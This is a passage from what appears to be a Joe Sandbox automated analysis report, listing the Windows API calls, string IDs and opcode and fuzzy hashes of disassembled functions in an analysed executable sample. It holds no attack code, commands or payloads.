                          • Instruction Fuzzy Hash: 95219225E0C65281EA66FB11A50033DE3A0FF47BA4F144530DA5DCEA88EF7CD8858711
                          APIs
                            • Part of subcall function 00007FF64D33ECD8: ResetEvent.KERNEL32 ref: 00007FF64D33ECF1
                            • Part of subcall function 00007FF64D33ECD8: ReleaseSemaphore.KERNEL32 ref: 00007FF64D33ED07
                          • ReleaseSemaphore.KERNEL32 ref: 00007FF64D33E974
                          • FindCloseChangeNotification.KERNELBASE ref: 00007FF64D33E993
                          • DeleteCriticalSection.KERNEL32 ref: 00007FF64D33E9AA
                          • CloseHandle.KERNEL32 ref: 00007FF64D33E9B7
                            • Part of subcall function 00007FF64D33EA5C: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF64D33E95F,?,?,?,00007FF64D33463A,?,?,?), ref: 00007FF64D33EA63
                            • Part of subcall function 00007FF64D33EA5C: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF64D33E95F,?,?,?,00007FF64D33463A,?,?,?), ref: 00007FF64D33EA6E
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: CloseReleaseSemaphore$ChangeCriticalDeleteErrorEventFindHandleLastNotificationObjectResetSectionSingleWait
                          • String ID:
                          • API String ID: 2143293610-0
                          • Opcode ID: 7c4c69b688bb09167c3d8ec6f4195a818a409db0987586a56ae23aa503e7e0cd
                          • Instruction ID: 69582f0f0566e10b378b71dca4f5950df257375d7b112ed057dd75fd449d69eb
                          • Opcode Fuzzy Hash: 7c4c69b688bb09167c3d8ec6f4195a818a409db0987586a56ae23aa503e7e0cd
                          • Instruction Fuzzy Hash: 88012D32E18A81A3E659BB21E54426DA330FB89B80F005131DB6D93665DF39E4B4C740
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: Thread$CreatePriority
                          • String ID: CreateThread failed
                          • API String ID: 2610526550-3849766595
                          • Opcode ID: cf4f3858e1c5421656891f758a667cd72a6f2059ba57d4f8d940dbc9b5e0f540
                          • Instruction ID: 17c2d8a895d0875e64cde1f56773943b839c8072d67c0885f1153fc8601dc94a
                          • Opcode Fuzzy Hash: cf4f3858e1c5421656891f758a667cd72a6f2059ba57d4f8d940dbc9b5e0f540
                          • Instruction Fuzzy Hash: 12114F31E0CA4281EB12FB15E9412AAF361FB85798F544231EA4E82A69FF7CE595C740
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: DirectoryInitializeMallocSystem
                          • String ID: riched20.dll
                          • API String ID: 174490985-3360196438
                          • Opcode ID: 0d85db053d286d1bd0fa19ead2840fc3f5149c6ee0f027e6ed6c33eb2c824e37
                          • Instruction ID: fce47693aea1c9d89ebb79a7059bb93a88f9565b38891c59e99195dca2acedb4
                          • Opcode Fuzzy Hash: 0d85db053d286d1bd0fa19ead2840fc3f5149c6ee0f027e6ed6c33eb2c824e37
                          • Instruction Fuzzy Hash: B2F03C71A1CA8182EB12BF20F4151AAB3A0FB89754F400135E98DC2A54EF7CE159CB00
                          APIs
                            • Part of subcall function 00007FF64D34853C: GlobalMemoryStatusEx.KERNEL32 ref: 00007FF64D34856C
                            • Part of subcall function 00007FF64D33AAE0: LoadStringW.USER32 ref: 00007FF64D33AB67
                            • Part of subcall function 00007FF64D33AAE0: LoadStringW.USER32 ref: 00007FF64D33AB80
                            • Part of subcall function 00007FF64D321FA0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D321FFB
                            • Part of subcall function 00007FF64D32129C: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF64D321396
                          • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D3501BB
                          • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D3501C1
                          • SendDlgItemMessageW.USER32 ref: 00007FF64D3501F2
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo_noreturn$LoadString$Concurrency::cancel_current_taskGlobalItemMemoryMessageSendStatus
                          • String ID:
                          • API String ID: 3106221260-0
                          • Opcode ID: f7a8a175be1daf3eca109b687688224756fee905e724f508e14b940bc333b7d5
                          • Instruction ID: b9812b4874ca528098fb10a8f7f5cd0cffdbef97cd38a9a31d2964ab4141930f
                          • Opcode Fuzzy Hash: f7a8a175be1daf3eca109b687688224756fee905e724f508e14b940bc333b7d5
                          • Instruction Fuzzy Hash: 8B51A662F0D64296FB11BBA5D4552FDA362AB86BC8F404135DE1D97BDAFE2CE500C340
                          APIs
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: CreateFile$_invalid_parameter_noinfo_noreturn
                          • String ID:
                          • API String ID: 2272807158-0
                          • Opcode ID: 650906bb36444c59f78769edd7e70a31dc34f49dc41decdeb4024168be9b1e6b
                          • Instruction ID: aee3df81a32e500b5c351776184122c3af9d3b54a208e168e5ec3f3eacae62d7
                          • Opcode Fuzzy Hash: 650906bb36444c59f78769edd7e70a31dc34f49dc41decdeb4024168be9b1e6b
                          • Instruction Fuzzy Hash: 4441C166E0C68182EB61EB15E544269A3A0FB867B4F505734DFAD83AD5EF3CE490C700
                          APIs
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: TextWindow$Length_invalid_parameter_noinfo_noreturn
                          • String ID:
                          • API String ID: 2176759853-0
                          • Opcode ID: 1bf85210b9a87779fb11811f9a7e2f8ba75c636e64e4f9da94f36f1c7ff0fb34
                          • Instruction ID: c4948d4e1ae5817beab3878dd7e0d36e2ecdaf5481f086ccc02621724946821a
                          • Opcode Fuzzy Hash: 1bf85210b9a87779fb11811f9a7e2f8ba75c636e64e4f9da94f36f1c7ff0fb34
                          • Instruction Fuzzy Hash: 8C217162E1CB8581EA11FB65A84017AE3A5FB8ABD0F145235EBDD43B95EF3CD1908740
                          APIs
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: std::bad_alloc::bad_alloc
                          • String ID:
                          • API String ID: 1875163511-0
                          • Opcode ID: ed06525d720d284fc54222632f53f2fcbb29030dbea5caf8b24800418b5d5b0f
                          • Instruction ID: 0b2ac8d5062510f68024e54012229b94c797f3a846f741936ce84f56df5e6ae9
                          • Opcode Fuzzy Hash: ed06525d720d284fc54222632f53f2fcbb29030dbea5caf8b24800418b5d5b0f
                          • Instruction Fuzzy Hash: 7831F512E0CA8691FB66F710E4443B9E3E0FB42B84F544031D24C929A9EF7DE946C301
                          APIs
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                          • String ID:
                          • API String ID: 1203560049-0
                          • Opcode ID: 30421b436104fcb90b4cd2208b99a3bf3782908f0837f7a91d3eb4cb73bf7196
                          • Instruction ID: 4ae06e9e8a47726936b97b4a922b26b624866f5d998b8684541b78f50f861041
                          • Opcode Fuzzy Hash: 30421b436104fcb90b4cd2208b99a3bf3782908f0837f7a91d3eb4cb73bf7196
                          • Instruction Fuzzy Hash: 2521C862E1CA8181EE21BB25E45526DA361FF8AB94F505230EA9E86AD5FF3CD540C600
                          APIs
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: DeleteFile$_invalid_parameter_noinfo_noreturn
                          • String ID:
                          • API String ID: 3118131910-0
                          • Opcode ID: 539e2a0488ada646b9a4eb5c90a9f278ffd13936dc8dbc7caf4118334a65d282
                          • Instruction ID: c3f38c4bdb51f509764b524e19eef4859d8c8cacc7c09ab76f25a1374924f0f3
                          • Opcode Fuzzy Hash: 539e2a0488ada646b9a4eb5c90a9f278ffd13936dc8dbc7caf4118334a65d282
                          • Instruction Fuzzy Hash: 17219B62E1C78181EE11BB25F55516EA360FF8ABD4F505234EA9DC6AD5EF3CD540C700
                          APIs
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                          • String ID:
                          • API String ID: 1203560049-0
                          • Opcode ID: a8bcf6e2598255fa991570dfaf367ef52c8767d47326b3423635884fafe6ecbe
                          • Instruction ID: 600ba852df9420f4a692dfb9c34382732e2dc3d99ab30f59f1b25a02feda4c41
                          • Opcode Fuzzy Hash: a8bcf6e2598255fa991570dfaf367ef52c8767d47326b3423635884fafe6ecbe
                          • Instruction Fuzzy Hash: D0217462E1CA8181EE15BB29F54412DA361FB8A7A4F505231EA9D87BE5EF3CD540C604
                          APIs
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: Process$CurrentExitTerminate
                          • String ID:
                          • API String ID: 1703294689-0
                          • Opcode ID: 44b3a526fe0d15710854bc957cc7a82f9edee4cc7420f0560de4bec5ea2a17a0
                          • Instruction ID: f8d87a6d90d61bfb374c78a2e3619f66752803be22faa84089699d205e61a143
                          • Opcode Fuzzy Hash: 44b3a526fe0d15710854bc957cc7a82f9edee4cc7420f0560de4bec5ea2a17a0
                          • Instruction Fuzzy Hash: 1BE04F29F0C70686EB657B3198A537DA3626F9AB41F105478D80E833D6EE3DA4098700
                          APIs
                          • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D32F895
                          • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D32F89B
                            • Part of subcall function 00007FF64D333EC8: FindClose.KERNELBASE(?,?,00000000,00007FF64D340811), ref: 00007FF64D333EFD
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo_noreturn$CloseFind
                          • String ID:
                          • API String ID: 3587649625-0
                          • Opcode ID: 9a071fa467f85a34a6f05ca9243d790f6abafaa5b1570881c384a2819231f8c8
                          • Instruction ID: 5ff81ea6fe61129335c28b556d9f08573cb90f285c984efc22f8534960a2fdf5
                          • Opcode Fuzzy Hash: 9a071fa467f85a34a6f05ca9243d790f6abafaa5b1570881c384a2819231f8c8
                          • Instruction Fuzzy Hash: D391B073E1CB8190EB11FB25D8402EDA361FB86798F904136EA5C87AE9EF78D545C340
                          APIs
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo_noreturn
                          • String ID:
                          • API String ID: 3668304517-0
                          • Opcode ID: 08c6e2d20e94fe5d114b94b17f84e93e5249d169b81ce8341d273cd43f7755ea
                          • Instruction ID: b1213aa503bfa5511c589a6c610b5e2a1766f9caae742801879de97209aee9b0
                          • Opcode Fuzzy Hash: 08c6e2d20e94fe5d114b94b17f84e93e5249d169b81ce8341d273cd43f7755ea
                          • Instruction Fuzzy Hash: C741C362F1C65184FF02FBB1D4502EDA361AF46BD8F145239DE1DA7ADAEE38D4828340
                          APIs
                          • SetFilePointer.KERNELBASE(00000000,00000002,?,00000F99,?,00007FF64D33274D), ref: 00007FF64D3328A9
                          • GetLastError.KERNEL32(?,00007FF64D33274D), ref: 00007FF64D3328B8
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: ErrorFileLastPointer
                          • String ID:
                          • API String ID: 2976181284-0
                          • Opcode ID: 043a82e8aff847b2e282b78885e55c7214a93c585b530bdf19c19deffc600893
                          • Instruction ID: ee2ae97dc55a36a8e4b1ed7ca4a0707ebf505197e4984559590acf2168bfc1f6
                          • Opcode Fuzzy Hash: 043a82e8aff847b2e282b78885e55c7214a93c585b530bdf19c19deffc600893
                          • Instruction Fuzzy Hash: F331C526F1DA5683EA62BB2ADA4067DA350AF06BD4F145131DE5D8BB90FE3CD4818740
                          APIs
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: Item_invalid_parameter_noinfo_noreturn
                          • String ID:
                          • API String ID: 1746051919-0
                          • Opcode ID: 95739ad7301a08b82252912ada3ab6f57aee1bff7a48893d1edd4817af44debc
                          • Instruction ID: e899db0d9c30b651e1aef4c5f3365c207e676ba13d9ea7d4e04b16948cf99983
                          • Opcode Fuzzy Hash: 95739ad7301a08b82252912ada3ab6f57aee1bff7a48893d1edd4817af44debc
                          • Instruction Fuzzy Hash: 5A31C122E1C74582EA21FB15F8443AEF360EB86794F445235EB9C4BB95EF3CE5408744
                          APIs
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: File$BuffersFlushTime
                          • String ID:
                          • API String ID: 1392018926-0
                          • Opcode ID: 1f7bfd0f82637a6abdcd08aef8b442a865f6f50d97ba3a1fa7ef62b0e093425a
                          • Instruction ID: 81ca5889abb0e598171d8e18b5ae659dd11855c23d74d82a32ff43f6ba99397a
                          • Opcode Fuzzy Hash: 1f7bfd0f82637a6abdcd08aef8b442a865f6f50d97ba3a1fa7ef62b0e093425a
                          • Instruction Fuzzy Hash: 3521B026E0DB4259EA63FF11D6047BA9790AF03794F154131DE4C46A95FEBCE886C200
                          APIs
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: Initialize_invalid_parameter_noinfo_set_fmode
                          • String ID:
                          • API String ID: 3548387204-0
                          • Opcode ID: e8e9d160ec1903a932a5a39018fe25c36d4ba16f106dc0af14eb3e24c8a7c370
                          • Instruction ID: ec3a413c31fc0aa1096f38365b95a7ed92f9ddb17d37035c23be5583dc78c172
                          • Opcode Fuzzy Hash: e8e9d160ec1903a932a5a39018fe25c36d4ba16f106dc0af14eb3e24c8a7c370
                          • Instruction Fuzzy Hash: 9711DD65E1D24341FE57B3B448762FDC2815FA3348F850434E92DC62C3FD2CB89586A2
                          APIs
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
